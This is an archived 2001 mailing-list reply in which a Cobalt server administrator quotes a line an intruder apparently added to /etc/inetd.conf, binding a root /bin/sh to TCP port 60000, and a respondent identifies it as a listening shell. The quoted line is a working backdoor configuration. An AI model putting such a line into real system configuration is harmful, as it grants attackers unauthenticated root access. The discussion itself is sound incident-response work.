[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Subject: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
From: RaQ3 <cobalt@xxxxxxxxxxx>
Date: Sun Feb 25 21:15:03 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

"Craig Napier" <craignapier@xxxxxxxxxxx> wrote on 15.02.01 06:35:44:
>
>We just replaced a system that had been hacked over the weekend, and 
>after reading the last post (Another Hack), I checked /etc/inetd.conf 
>on all three boxes.. The one that was just replaced has a new line at 
>the bottom of the file that the other two boxes don't have...
>
># End of inetd.conf
>#swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
>60000 stream tcp nowait root /bin/sh sh -i
>
>What is port 60000..? Should I just remove this line and reboot the 
>box. .? Just trying to figure out if it's compromised again.. even 
>with all the patches and updates installed *EVEN* before it was 
>brought back online.. 

Hi Craig !

It looks as if the shell is listening on port 60000. I think this is not
the very best idea unless you are doing it for a VERY special reason.

Good luck !
Thomas

--
InternAd.de
Internet Advertising
Thomas Prosi
tp@xxxxxxxxxxx

Follow-Ups:
- Re: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: Danny Daniels

Prev by Date: RE: [cobalt-users] Trinoo DDoS server in init
Next by Date: Re:[2] [cobalt-users] Deterring Hackers
Previous by thread: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
Next by thread: Re: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index